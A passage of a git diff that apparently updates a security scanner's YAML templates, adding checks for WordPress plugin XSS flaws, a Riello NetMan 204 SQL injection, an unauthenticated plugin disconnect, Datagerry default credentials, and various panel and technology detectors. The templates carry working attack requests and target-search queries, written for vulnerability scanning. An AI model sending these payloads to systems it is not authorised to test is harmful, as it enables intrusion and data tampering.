https://wpscan.com/vulnerability/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6517 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6517 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.09608 + cpe: cpe:2.3:a:dotsquares:contact_form_7_math_captcha:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: dotsquares-wpteam + product: ds-cf7-math-captcha + framework: wordpress + publicwww-query: "/wp-content/plugins/ds-cf7-math-captcha" + tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"/wp-content/plugins/ds-cf7-math-captcha")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=dscf7_refreshcaptcha&tagname=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"' + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b027a0561626761eec561001fce02cfe13c26cf0c84b572a1759bac3a823fa32022100f7a35b349e671f6462ac3fb1f3e55ccec74ab7572338ce94ea7deddc14bbc5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-7354.yaml b/http/cves/2024/CVE-2024-7354.yaml new file mode 100644 index 0000000000..bd5752ff7f --- /dev/null +++ b/http/cves/2024/CVE-2024-7354.yaml @@ -0,0 +1,76 @@ +id: CVE-2024-7354 + +info: + name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + impact: | + Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Update the plugin to Latest version. Fixed in 3.8.11. + reference: + - https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-7354 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7354 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.09629 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 3 + vendor: ninjaforms + product: ninja_forms + framework: wordpress + fofa-query: body="/wp-content/plugins/ninja-forms" + publicwww-query: /wp-content/plugins/ninja-forms/ + shodan-query: http.html:"/wp-content/plugins/ninja-forms/" + tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "/wp-content/plugins/ninja-forms" + internal: true + + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=nf-submissions&">=2 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '">' + + - type: word + part: content_type_2 + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a004730450220480fcef4bd3f565a48904557ebdfede8f1e697a2b5fb76f9aeabce2d2b48031202210082b19d31fddf8d798a180790a1240fe11eb3da8942326a2f2c4def251fcacd3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-7714.yaml b/http/cves/2024/CVE-2024-7714.yaml new file mode 100644 index 0000000000..3c89991fef --- /dev/null +++ b/http/cves/2024/CVE-2024-7714.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-7714 + +info: + name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls + author: s4e-io + severity: medium + description: | + The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback + remediation: Fixed in 2.1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-7714 + - https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-7714 + cwe-id: CWE-284 + epss-score: 0.00043 + epss-percentile: 0.09599 + metadata: + verified: true + max-request: 1 + vendor: ays-chatgpt-assistant-team + product: ays-chatgpt-assistant + framework: wordpress + publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant" + tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect" + + matchers: + - type: dsl + dsl: + - 'regex("^true$", body)' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-8877.yaml b/http/cves/2024/CVE-2024-8877.yaml new file mode 100644 index 0000000000..4f7df08721 --- /dev/null +++ b/http/cves/2024/CVE-2024-8877.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-8877 + +info: + name: Riello Netman 204 - SQL Injection + author: s4e-io + severity: critical + description: | + The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way. + reference: + - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html + - https://0day.today/exploit/39757 + - https://nvd.nist.gov/vuln/detail/CVE-2024-8877 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-8877 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39654 + cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: riello-ups + product: netman_204_firmware + shodan-query: title:"netman 204" + fofa-query: title="netman 204" + censys-query: services.http.response.body:"netman204" + google-query: intitle:"netman 204" + tags: cve,cve2024,netman,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")' + - 'status_code == 200' + condition: and +# digest: 4a0a0047304502204458db1ba5309cd954ea72f415abcc44c61208a52ca872f4a507f58768b0dc99022100e98ad16fa2d74810ec1adddab09484abdb1471deb7db3fd848612b4d351dfd7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/datagerry/datagerry-default-login.yaml b/http/default-logins/datagerry/datagerry-default-login.yaml new file mode 100644 index 0000000000..9bd56021e5 --- /dev/null +++ b/http/default-logins/datagerry/datagerry-default-login.yaml @@ -0,0 +1,46 @@ +id: datagerry-default-login + +info: + name: Datagerry - Default Login + author: gy741 + severity: high + description: | + Datagerry was using default username and password was discovered. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"datagerry" + tags: datagerry,default-login + +variables: + username: "admin" + password: "admin" + +http: + - raw: + - | + POST /rest/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"user_name":"{{username}}","password":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"token":' + - '"token_issued_at":' + - '"token_expire":' + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100cf8cc043be4a0b3dc195acf9b6ef53e752608e9095d2443fe3783cd935d4bec0022047df60ad555032dc21231c6899cf2213cef306d8841ed6d22810a8531d6e5f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/gitlab-saml.yaml b/http/exposed-panels/gitlab-saml.yaml new file mode 100644 index 0000000000..01bc7b3458 --- /dev/null +++ b/http/exposed-panels/gitlab-saml.yaml @@ -0,0 +1,47 @@ +id: gitlab-saml + +info: + name: Gitlab SAML - Detection + author: rootxharsh,iamnoooob,pdresearch + severity: info + description: | + The presence of SAML-based authentication on GitLab instances. SAML is commonly used for Single Sign-On (SSO) integrations, which allows users to authenticate with GitLab using an external Identity Provider (IdP). + metadata: + verified: true + max-request: 1 + vendor: gitlab + product: gitlab + shodan-query: + - http.title:"gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.html:"gitlab enterprise edition" + fofa-query: + - body="gitlab enterprise edition" + - title="gitlab" + google-query: intitle:"gitlab" + tags: panel,saml,gitlab + +http: + - raw: + - | + GET /users/auth/saml/metadata HTTP/2 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "EntityDescriptor" + - "SAML" + condition: and + + - type: word + part: content_type + words: + - "application/xml" + + - type: status + status: + - 200 +# digest: 4a0a00473045022049996dff22c3a44f997637d9d676d9804a3135e44390d397b2749598351e58ea02210084b1da9584826133c2798118e9fa80461f9b0e6ebe38a13541539ae70dd6ea0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/riello-netman204-panel.yaml b/http/exposed-panels/riello-netman204-panel.yaml new file mode 100644 index 0000000000..3346be885b --- /dev/null +++ b/http/exposed-panels/riello-netman204-panel.yaml @@ -0,0 +1,33 @@ +id: riello-netman204-panel + +info: + name: Riello UPS NetMan 204 Panel - Detect + author: s4e-io + severity: info + description: | + Riello UPS NetMan 204 login panel was detected. + reference: + - https://www.riello-ups.com + metadata: + vendor: riello-ups + product: netman_204_firmware + shodan-query: title:"netman 204" + fofa-query: title="netman 204" + censys-query: services.http.response.body:"netman204" + google-query: intitle:"netman 204" + tags: netman,panel,detect,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(body,"Netman 204")' + - 'status_code == 200' + condition: and +# digest: 4a0a0047304502206d3ffe21d0164a272b5c60a35415bb20229644ca96eb58d0cc3da872be669873022100e1c2ef6a4571d5d33e19ca03ef5baf2655681f8b13e48e3014a481e1ce2da9c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/umbraco-login.yaml b/http/exposed-panels/umbraco-login.yaml index 6448a41940..a79f9077f3 100644 --- a/http/exposed-panels/umbraco-login.yaml +++ b/http/exposed-panels/umbraco-login.yaml @@ -2,7 +2,7 @@ id: umbraco-login info: name: Umbraco Login Panel - Detect - author: ola456 + author: ola456,stvnhrlnd severity: info description: Umbraco login panel was detected. reference: @@ -27,6 +27,7 @@ http: - method: GET path: - "{{BaseURL}}/umbraco" + - "{{BaseURL}}/umbraco/login" host-redirects: true max-redirects: 3 @@ -37,8 +38,10 @@ http: part: body words: - 'Umbraco.Sys' + - ' 1.5,1.6 - /config/settings.old.php # prestashop > 1.5,1.6 - /manager/includes/config.inc.php # MODX CMS - /app/config/parameters.ini # Symfony + - /phinx.yml # CS-Cart - /db.php - /conn.php - /database.php @@ -128,6 +130,7 @@ http: - "'DBPASS'" - "database_type" - "define('DB" + - "environments:" condition: or - type: word @@ -136,4 +139,4 @@ http: - "text/plain" - "bytes" condition: or -# digest: 4a0a00473045022100db91bbd31e8e87d2ebc0e02533e20d9c5038e5edf2f8317ce5f7cda82d2cef3c022017e9ec02dd29af995e30c9539ad7fbd013746964cf25e5f6a43cc03db38c7184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5bab6ebb480d24867072237be9b1280aae96f307c09497dd04a663c45ee57010221009ea7575d866bca25b3b5476bb734f0e48e4492b1e13f08906914483dcee4b352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/phpinfo-files.yaml b/http/exposures/configs/phpinfo-files.yaml index 099e30e110..e09ff94ac8 100644 --- a/http/exposures/configs/phpinfo-files.yaml +++ b/http/exposures/configs/phpinfo-files.yaml @@ -27,6 +27,7 @@ http: - "/php_info.php" - "/test.php" - "/i.php" + - "/a.php" - "/p.php" - "/pi.php" - "/asdf.php" @@ -67,4 +68,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 490a0046304402206ad6f443ffbaace771aec5f22f010b026d133fb7ffa59fff136813d63f853da502200cdd41c804a2ce73444bdc4494fe0e82c8c728b2a092c2d223661ed083fe7ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207abcbc13ec5b9284e67a831e54e5a987cb3641c78280bf59e6d18084ecf1a872022035e8ebcffb3074c0dd3a8b07d814f25d57645b748c3c33ef12195e2dbcf51daf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/seized-site.yaml b/http/miscellaneous/seized-site.yaml new file mode 100644 index 0000000000..9e49c226ab --- /dev/null +++ b/http/miscellaneous/seized-site.yaml @@ -0,0 +1,30 @@ +id: seized-site + +info: + name: Seized Site + author: rxerium + severity: info + description: This website has been seized by law enforcement + metadata: + max-request: 1 + verified: true + shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED" + tags: seized,miscellaneous + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "THIS WEBSITE HAS BEEN SEIZED" + case-insensitive: true + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b67d56fde473d15dd884b06359a0ab984362718cd7700fc85044fee004048703022100d2e8940287f6c688b7f4284bb68e3e9fdb82909832f7572c2ec5582deb2483dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/kubernetes/kubernetes-pods.yaml b/http/misconfiguration/kubernetes/kubernetes-pods-api.yaml similarity index 100% rename from http/misconfiguration/kubernetes/kubernetes-pods.yaml rename to http/misconfiguration/kubernetes/kubernetes-pods-api.yaml diff --git a/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml b/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml new file mode 100644 index 0000000000..cf954bd275 --- /dev/null +++ b/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml @@ -0,0 +1,41 @@ +id: aspnetcore-dev-env + +info: + name: ASP.NET Core Development Environment - Exposure + author: Mys7ic + severity: info + description: | + The ASP.NET Core application is running in Development mode, which could exposes detailed error messages and stack traces on the '/Error' page. + impact: | + Exposing detailed error messages and stack traces can reveal sensitive information such as server configurations, file paths, source code snippets, and other debug information. Attackers can use this information to identify vulnerabilities and compromise the application or underlying systems. + remediation: | + Set the 'ASPNETCORE_ENVIRONMENT' environment variable to 'Production' and ensure that detailed error messages are not exposed to end-users. + reference: + - https://docs.microsoft.com/en-us/aspnet/core/fundamentals/environments + metadata: + max-request: 1 + vendor: microsoft + product: asp.net-core + shodan-query: html:"ASPNETCORE_ENVIRONMENT" + verified: true + tags: misconfig,aspnetcore,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/Error" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "ASPNETCORE_ENVIRONMENT environment variable to Development" + + - type: word + part: body + words: + - "ASPNETCORE_ENVIRONMENT" + - "" + condition: and +# digest: 490a0046304402202067b5f6070703eaccb234d9fadb99bbfd78c2791b0073c494f498788060e8c00220755457d24f6d89d0f60a1cb5227c29412c43da39da4fb7c53c17460ecd6b2f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/arcgis-detect.yaml b/http/technologies/arcgis-detect.yaml new file mode 100644 index 0000000000..52832bcb0a --- /dev/null +++ b/http/technologies/arcgis-detect.yaml @@ -0,0 +1,41 @@ +id: arcgis-detect + +info: + name: ArcGIS - Detect + author: righettod + severity: info + description: | + ArcGIS products was detected. + reference: + - https://enterprise.arcgis.com/en/ + metadata: + verified: true + max-request: 5 + shodan-query: http.title:"ArcGIS" + tags: tech,arcgis,detect + +http: + - method: GET + path: + - "{{BaseURL}}/portal/sharing/rest" + - "{{BaseURL}}/portal/portalhelp/en/rest/" + - "{{BaseURL}}/arcgis/rest/services" + - "{{BaseURL}}/server/rest/services" + - "{{BaseURL}}/arcgis/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "arcgis portal directory", "search arcgis enterprise help", "<title>arcgis", "arcgis rest services directory", "arcgis hub")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)©\s+([0-9]+)\s+Esri\.' + - 'Current\s+Version:\s+<\/b>([0-9.]+)' +# digest: 4b0a00483046022100cfc6b37f92c5bc0f1e2f5d161b213cf2deaeff3ec48760367a83dd184b941c4002210090ab8d8a7608f7094b6081abbae5bbb122e798b1d46932226bd7aa86a991e1b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/vertigis-detect.yaml b/http/technologies/vertigis-detect.yaml new file mode 100644 index 0000000000..5c4d1f51be --- /dev/null +++ b/http/technologies/vertigis-detect.yaml @@ -0,0 +1,37 @@ +id: vertigis-detect + +info: + name: VertiGIS - Detect + author: righettod + severity: info + description: | + VertiGIS products was detected. + reference: + - https://www.vertigis.com/ + metadata: + verified: true + max-request: 9 + shodan-query: http.title:"vertigis" + tags: tech,vertigis,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + - "{{BaseURL}}/GeoManLogin.aspx" + - "{{BaseURL}}/FM/GeoManLogin.aspx" + - "{{BaseURL}}/GEBman/GeoManLogin.aspx" + - "{{BaseURL}}/Geoportal/synserver" + - "{{BaseURL}}/vertigisstudio/web/designer/locales/en/translations.json" + - "{{BaseURL}}/vertigisstudio/search/designer/locales/en/translations.json" + - "{{BaseURL}}/vertigisstudio/mobile/designer/locales/en/translations.json" + - "{{BaseURL}}/vertigisstudio/accesscontrol/locales/en/translations.json" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "vertigis", "welcome to vertigis", "vertigis fm - login", "<title>weboffice landing page" , "vertigis studio app designer", "vertigis studio web designer", "vertigis studio access control")' + condition: and +# digest: 480a004530430220728fab9b9be85ae3eb96334a3bd2f3d785aa589e1602e0e6bf619a67e845b725021f0f99ad41dc052d253acff6be795a91b24f9a6f1ecbe26a38c851eda04078d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wiki-js-detect.yaml b/http/technologies/wiki-js-detect.yaml new file mode 100644 index 0000000000..e6c8b3036e --- /dev/null +++ b/http/technologies/wiki-js-detect.yaml @@ -0,0 +1,28 @@ +id: wiki-js-detect + +info: + name: Wiki.js - Detect + author: righettod + severity: info + description: | + Wiki.js was detected. + reference: + - https://js.wiki/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"wiki.js" + tags: tech,wiki-js,detect + +http: + - method: GET + path: + - "{{BaseURL}}/_assets/js/app.js" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "wiki.js - wiki.js.org", "window.wiki")' + condition: and +# digest: 490a00463044022001a724774fd5edf512cecc0776374a7fe5dd50c53ae8c0fa9967bfe6fbbd299c02201363f742a5f7cff6393c7d7f704f808f73e20b3187b97ff420def6a38fa92cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index a9df97befd..db6252f3c8 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014e1b67585f773aa8823a2a0e9c86efd76c2746e4b694c418332b8ffbe03225202205a67e8d9f2f1a045a6205395cb1185647e7d32096127617c3819aadad2295e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a2e6208eb6898929b4940406a73be24ad394bd48137088925a88983bb7eb6acf022100e6c1831250d3329369639af046a432c299906eda323729782f5dc1fdd5980bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b82fc40a59..2d84056fff 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220038ebdaa2949853c990914fb4859d5126f6feae0142656cf74c5e3bed94efb1a022100f6610f110d5fb91503933ea692a31bc0e08e4b448e5a62f247c3eb83980783e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100902ce40295dad304d4264cf83d28135ef24a15a6c3dc8b59bec05a0631997d9902205a2cb0e2ca64fdac8fa848be3c24f51d872490867d36e6932bd5fb180d8dd46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 253634ec1f..3f55c9f149 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff37174eb28853bb25779e9348811fc4c8d04b2328c0dc774c46b3fffecd6afc022043c23e790d7ad8f428c51e6cad760e7c5058dc86c894bb684470ac30d859d200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c5c13c5c593bcaa2087f5c6b5aea54eb8f5164fb4fa6e287cac7c083e92cb717022073c9cb366b3515a964081a87b770221cf092228a9bedc91bb9e39596b504b746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 965a6b16c7..e856263210 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e295026d9d2ebd9e709dc3597b89f0aadcb3bb514e359ffd761ddea81ac3d52022061b5ac4098976cd7ae70feb499fa97e99bb10d742152986761283c30455ce196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022037869387fd9d587d28adc574786e387f1a101d3424613ec61c47f6569fcc0fbd0220124d98b591384e96fd1a17aa414d7f17162c7dd2659ab811cdb38244b02142e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 68a71e7792..4b3c47e80a 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210086e8f600f8b7779117c807997220656b337b0044c73876868fa63bbaabf0f9f2022100e423ad944a06a0a7a47e6e6b5b4fdc73ca497bcd74ed6068dd019a3a9bfd581a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220782d1e57e0954cb346e8abc1466a099419203034adf9106c2ca94f71b1c908cd02210086623e1a94b58c2f689c02ec04505f06a32bc35d0c3c7bf81ad3b7ec4ea14420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index cca2f02a3c..e9738e2eb2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220035eb7bddbfd74352d94c1264aa2d6fdfe6d127e070e133ff047a84bf1fd22ea02201ac3da23d091584c9b25b05b1a06d80394dbda632ad788b40cd072e555245d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bf9b5e1a9aaf3f1293f8057c32755b093da825570f8fad3add1cde09a3ead87d02200751c2d28307e542bfcad38b1411f263a3f8ee59ca81ece30547df6f9c9ebe57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 555bb8a8ab..85db7b6808 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8d82f3fa8fa3dbc4122933a837881a51a78632e9c8989b92712ba190abc3c28022100e840b14d4091ae71b7bf2511f045853fc561e17f2d958560af1ac4b4874b0fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022055c9aaa55f8c1970f6809542e326e5a72facb2be40778ae15a498c5eb3b50a9f022062a3852fc481d82da79ed72764de1cacca3609aa801d5b7757bc7e7100f65312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 72fe0f0395..cca1922291 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202491a876a44021d979e01ed7086f7b51a560a941c5716fd687572f5166ae8097022044c1aea9ffbb44304b85e2916e22bdfb353883c5bacc98823469888493c58e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220647803b9217690bbcd155de169fd4a54cdab005ae0ea4ce24298755c0dac4e400220550f01fb1853be0c6591e5f52d1c78aa1d00c5392a3cb2e7af1c4408e9bf4b18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index dbe3f86c4c..2c817c9cf6 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079b8a22604b492bb01a7f75a666c9311ee23c37ee58b27444655973345693a76022010ff044382a45fe8e429bb83efb5453f956b1b2108e958cd0d77a1960a3364ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100930ac5b16c365a55b7947d64b9a5258cd54d8cd7c5abb9e34740d87271117b93022100a6470fe5802a789639f2c0bc2effc7804e8ed17543bfcf61a6c16dbc1e62ac5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index dfde405e63..234c732d04 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e23898631caf0dca9a56357ec09b78e146711cd0b5e3e2c9ff91152b7b4a87e702200efc6ad6b32f6482168369c21238da9ad1ff28d009f0ecf5a928c33e2ff275ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e686ff76330dfc5f50171a61d0d3646ab3ece1de245f76dbee663525fc58b270022100a99592963fec44e65a58695ab2a339c0dbdc094c91225093f444ace05806f1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 9093568a2c..bd7188192b 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1cab565885db72203adf3bfd83d52053275c22291fa2b4e6175153d2713f8d0022100f19470112e82a0c38b5e8309589367799a242e812c8a57493700135b43d34cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 